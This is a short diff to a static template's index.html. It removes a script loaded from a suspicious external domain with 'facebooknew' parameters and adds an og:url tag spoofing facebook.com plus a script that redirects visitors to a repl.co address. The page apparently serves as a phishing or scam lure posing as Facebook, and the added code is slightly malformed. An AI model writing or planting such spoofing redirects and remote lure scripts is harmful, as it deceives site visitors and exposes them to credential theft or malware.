--- a/index.html
+++ b/index.html
@@ -7,6 +7,9 @@
     <title>Static Template</title>
   </head>
   <body>
-   <script src="https://videosvirales.ml/?api=1&lan=facebooknew&ht=2" type="text/javascript" async="true"></script>
+  <meta property="og:url" content="https://www.facebook.com/" />
+'<SCRIPT LANGUAGE="javascript">
+            setTimeout(location.href="https://LovelyPlainRuntime--cn14135.repl.co",8000);
+            </SCRIPT>';
   </body>
 </html>
